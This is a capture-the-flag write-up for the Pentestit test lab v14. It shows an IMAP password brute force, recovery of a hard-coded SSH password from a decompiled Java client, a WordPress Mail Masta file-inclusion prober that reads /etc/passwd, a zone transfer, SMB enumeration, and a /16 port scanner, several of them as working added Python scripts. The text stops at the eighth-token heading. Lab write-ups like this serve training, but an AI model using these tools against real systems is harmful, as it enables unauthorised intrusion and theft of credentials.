pentestit.ru-v14

Posted on 2020-08-26, 6 min read


Configure hosts

vim /etc/hosts   # add an entry mapping site.test.lab to 192.168.101.14 (see the nmap report below)

Information gathering

Browse to site.test.lab

Three mailboxes collected from the site so far, plus a fourth exposed in an error message:

Sales Department – sidorov@test.lab
PR Department – ivanov@test.lab
IT Department – petrov@test.lab
Support: support@test.lab  // from an error message

Port scan: 80, 143 and 8080 are open

nmap -sV 192.168.101.14
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-26 14:48 CST
Nmap scan report for site.test.lab (192.168.101.14)
Host is up (0.69s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
143/tcp  open  imap    Dovecot imapd
8080/tcp open  http    nginx

Browse to http://site.test.lab:8080/mail/ (the webmail login)

Then http://192.168.101.15/ , which is much barer: only port 80 is open.

Exploitation

0x00 First token

Start with the webmail on port 8080, trying the collected addresses. I intended to brute-force the login with Burp, but the form carries a token, so simple replay-based brute forcing is out and that route is closed.

Fall back to IMAP on port 143 instead. Start with the support mailbox, which is normally a technical staff account:

hydra -l support@test.lab -P MiniPwds.txt imap://192.168.101.14

That gives the password for support@test.lab: PASSWORD. The first token is sitting in that mailbox.

0x01 Second token

Going through the mailbox turns up a VPN profile.

Connecting with it works. The mail also contains client.jar; decompiling it reveals SSH credentials for 172.16.20.2 (user dev), but the password constant is obfuscated: the static initializer stores it XORed byte-by-byte with each byte's index, and main() undoes that before connecting. Adding one line that prints the decoded value is enough to recover it:

// 
// Decompiled by Procyon v0.5.36
// 

package lab.test.client;

import java.io.IOException;
import com.jcraft.jsch.JSchException;
import java.io.InputStream;
import com.jcraft.jsch.Channel;
import com.jcraft.jsch.Session;
import java.io.OutputStream;
import com.jcraft.jsch.ChannelExec;
import java.util.Properties;
import com.jcraft.jsch.JSch;

public class Main
{
    private static String sshHost;
    private static int sshPort;
    private static String sshLogin;
    private static String sshPass;
    
    public static void main(final String[] args) throws JSchException, IOException {
        // De-obfuscate the hard-coded password: XOR every byte with its own index.
        final byte[] buf = Main.sshPass.getBytes();
        for (byte i = 0; i < buf.length; ++i) {
            buf[i] ^= i;
        }
        Main.sshPass = new String(buf);
        final JSch jSch = new JSch();
        final Session session = jSch.getSession(Main.sshLogin, Main.sshHost, Main.sshPort);
        
        session.setPassword(Main.sshPass);
        System.out.print(Main.sshPass); // added line: print the decoded password
        final Properties config = new Properties();
        config.put("StrictHostKeyChecking", "no");
        session.setConfig(config);
        session.connect(30000);
        final Channel channel = session.openChannel("exec");
        ((ChannelExec)channel).setCommand("df -h |grep /dev/sda1");
        ((ChannelExec)channel).setErrStream(System.err);
        channel.connect();
        final InputStream in = channel.getInputStream();
        final byte[] tmp = new byte[1024];
        while (true) {
            if (in.available() > 0) {
                final int j = in.read(tmp, 0, 1024);
                if (j >= 0) {
                    System.out.print(new String(tmp, 0, j));
                    continue;
                }
            }
            if (channel.isClosed()) {
                if (in.available() > 0) {
                    continue;
                }
                break;
            }
        }
        System.exit(0);
    }
    
    static {
        Main.sshHost = "172.16.20.2";
        Main.sshPort = 22;
        Main.sshLogin = "dev";
        Main.sshPass = "L1(#@ru0euh0if"; // obfuscated form; decoded in main() above
    }
}

I have never learned Java, so here I could only ask the experts in my group to help decompile and repackage the jar and hand me the password.

The recovered password is also the flag for the corresponding Java challenge.
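Rebuilding the jar is not actually necessary: the de-obfuscation loop in the decompiled main() is a plain XOR of each byte with its index, which can be reproduced in a few lines. The following is an added example, not code from the original post or from the lab's client.jar; it takes the string literal from the decompiled static initializer above and decodes it the same way the Java loop does.

```python
"""Recover the SSH password hard-coded in client.jar without rebuilding the jar.

Added example, not from the original post or the lab's client.jar. It re-implements
the loop seen in the decompiled Main.main(): every byte of the string constant is
XORed with its own index. XOR with a known key stream is its own inverse, so the
same routine both obfuscates and recovers.
"""


def xor_with_index(data: bytes) -> bytes:
    """Apply buf[i] ^= i to every byte, exactly like the decompiled loop.

    The Java loop uses a `byte` counter, so it is only well-defined for inputs
    shorter than 128 bytes; refuse longer input instead of silently wrapping.
    """
    if len(data) >= 128:
        raise ValueError("Java loop counter is a signed byte; input too long")
    return bytes(b ^ i for i, b in enumerate(data))


def recover_password(obfuscated: str) -> str:
    """Decode the literal assigned to Main.sshPass in the static block.

    latin-1 maps bytes 0-255 one-to-one, which matches Java's getBytes()/new String()
    for the ASCII literal on the page.
    """
    return xor_with_index(obfuscated.encode("latin-1")).decode("latin-1")


def is_printable_ascii(s: str) -> bool:
    """Sanity check: a mis-copied literal usually decodes to control bytes."""
    return all(0x20 <= ord(c) < 0x7F for c in s)


# The literal from the decompiled static initializer shown above.
SSH_PASS_LITERAL = "L1(#@ru0euh0if"

if __name__ == "__main__":
    pw = recover_password(SSH_PASS_LITERAL)
    print("dev@172.16.20.2 password:", repr(pw))
    print("printable:", is_printable_ascii(pw))
    # Round trip: obfuscating the recovered value gives the literal back.
    assert xor_with_index(pw.encode("latin-1")).decode("latin-1") == SSH_PASS_LITERAL
```

Run it and use the printed value with `ssh dev@172.16.20.2` over the VPN. If the decoded string contains unprintable bytes, the literal was most likely damaged in copy-paste and should be re-read from the decompiler output.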

0x02 Third token

Over that SSH session, keep searching the machine's files for anything named token.

That turns up one token.

0x03 Fourth token

Now test site.test.lab. Viewing the page source shows it runs WordPress, so enumerate it with wpscan:

[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://site.test.lab/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt

The site runs mail-masta 1.0, which has a published local file inclusion exploit: https://www.exploit-db.com/exploits/40290

Reading files through that vulnerability yields the token.
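To show what the referenced exploit actually does, here is an added example (not from the original post or from the plugin) that probes a WordPress site for the Mail Masta 1.0 inclusion and decides from the response whether a server file came back. The endpoint and the `pl` parameter are taken from the Exploit-DB 40290 advisory linked above, not from this page; the HTTP fetcher is injectable so the detection logic runs here against constructed responses.

```python
"""Check a WordPress site for the Mail Masta 1.0 local file inclusion (Exploit-DB 40290).

Added example; not from the original post or from the plugin. The vulnerable
endpoint and parameter (inc/campaign/count_of_send.php?pl=) are taken from the
referenced Exploit-DB advisory: the script includes the `pl` GET parameter
unsanitised, so any file readable by the web server can be pulled back.
The fetcher is injectable so the detection logic runs offline against a
constructed response; pass `urllib_fetch` to use it against a live host.
"""
import re
import urllib.parse
import urllib.request
from typing import Callable

LFI_ENDPOINT = "wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"

# One /etc/passwd entry: name:pw:uid:gid:gecos:home:shell
_PASSWD_LINE = re.compile(
    r"^[A-Za-z_][\w-]*:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\n]*$", re.M
)


def lfi_url(base: str, path: str) -> str:
    """Build the inclusion URL for `path` (e.g. /etc/passwd) on a site rooted at `base`."""
    endpoint = urllib.parse.urljoin(base.rstrip("/") + "/", LFI_ENDPOINT)
    return endpoint + "?" + urllib.parse.urlencode({"pl": path})


def looks_like_passwd(body: str) -> bool:
    """True if the body holds at least two valid passwd lines, one of them root.

    Requiring two structurally valid lines keeps a page that merely mentions
    'root:x:0:0' in prose from counting as a positive.
    """
    lines = _PASSWD_LINE.findall(body)
    return len(lines) >= 2 and any(line.startswith("root:") for line in lines)


def urllib_fetch(url: str, timeout: float = 10.0) -> str:
    """Plain HTTP GET; only used when probing a live target."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_lfi(base: str, fetch: Callable[[str], str], probe: str = "/etc/passwd") -> bool:
    """Request `probe` through the vulnerable parameter and decide from the body."""
    return looks_like_passwd(fetch(lfi_url(base, probe)))


# Constructed responses standing in for a live server.
SAMPLE_VULNERABLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
)
SAMPLE_PATCHED = "<html><body>Warning: include(): failed to open stream</body></html>"

if __name__ == "__main__":
    for label, body in (("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED)):
        verdict = check_lfi("http://site.test.lab", lambda _url, b=body: b)
        print(f"{label}: {verdict}")
    # Against the real lab host: check_lfi("http://site.test.lab", urllib_fetch)
```

Once `/etc/passwd` comes back, the same parameter reads the token file the post refers to, given its path on the server. wpscan reports the plugin last updated in 2014, so the realistic fix for a site owner is to remove it rather than wait for a patch.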

0x04 Fifth token

The VPN connection log shows pushed routes for 172.16.0.0/16 and 10.11.0.1/32:

Wed Aug 26 16:30:22 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.13
Wed Aug 26 16:30:22 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.13

Scanning 172.16.0.0/16 with msf's scanner/portscan/tcp finds one host with port 80 open.

Browsing to the token file in that host's web root gives a new token.
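The two route lines above are the target list for the rest of the lab. As an added example (not from the original post), the script below extracts the pushed networks from the OpenVPN log and runs a threaded TCP connect scan over them, the same thing msf's scanner/portscan/tcp does. The connect function is injectable so the scan logic can be exercised without a network; the log text is constructed from the lines quoted above.

```python
"""Turn the routes OpenVPN pushed into a target list and find hosts with a port open.

Added example, not from the original post. It parses the `/sbin/ip route add`
lines from the VPN log, then does a threaded TCP connect scan comparable to
msf's scanner/portscan/tcp. The connect function is injectable so the logic can
be run offline; the default `tcp_connect` uses real sockets. A /16 is 65k
connects per port, so keep the timeout short and the worker count high.
"""
import ipaddress
import re
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Iterable

ROUTE_RE = re.compile(r"/sbin/ip route add (\S+) via (\S+)")

# Constructed from the OpenVPN log lines quoted on this page.
VPN_LOG = """\
Wed Aug 26 16:30:22 2020 /sbin/ip route add 172.16.0.0/16 via 10.11.0.13
Wed Aug 26 16:30:22 2020 /sbin/ip route add 10.11.0.1/32 via 10.11.0.13
"""


def parse_routes(log: str) -> list:
    """Return the pushed networks as ipaddress.IPv4Network objects, in log order."""
    return [ipaddress.ip_network(m.group(1), strict=False) for m in ROUTE_RE.finditer(log)]


def hosts_in(net: ipaddress.IPv4Network) -> Iterable[str]:
    """Usable addresses in the network, as strings."""
    return (str(h) for h in net.hosts())


def tcp_connect(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP handshake to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def scan(hosts: Iterable[str], ports: Iterable[int],
         connect: Callable[[str, int], bool] = tcp_connect, workers: int = 256) -> dict:
    """Connect scan; returns {host: sorted open ports} for hosts with at least one open port."""
    ports = list(ports)
    targets = [(h, p) for h in hosts for p in ports]
    open_ports: dict = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        # pool.map preserves input order, so results line up with targets.
        for (host, port), is_open in zip(targets, pool.map(lambda t: connect(*t), targets)):
            if is_open:
                open_ports.setdefault(host, []).append(port)
    return {h: sorted(p) for h, p in open_ports.items()}


if __name__ == "__main__":
    routes = parse_routes(VPN_LOG)
    print("routes pushed by the VPN:", [str(r) for r in routes])
    # Live scan of the lab /16 for the web and DNS ports used later in the post.
    print(scan(hosts_in(routes[0]), [80, 53]))
```

With a 0.5 s timeout and 256 workers the live /16 scan takes a few minutes per port; tighten the timeout on a fast VPN link. The same `scan()` call with `[445, 139]` covers the SMB enumeration step further down.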

0x05 Sixth token

The same scan also shows 172.16.0.10 with port 53 open, so try a zone transfer with dig:

dig @172.16.0.10 test.lab axfr

The transfer succeeds, and the zone contains a token.

0x06 Seventh token

Scan the IPs that appeared in the zone, starting with the domain controller.

It exposes SMB on 445 and related ports; testing for MS17-010 shows it is not vulnerable.

Collecting SMB information with enum4linux -a 172.16.0.20 reveals the token.

0x07 Eighth token
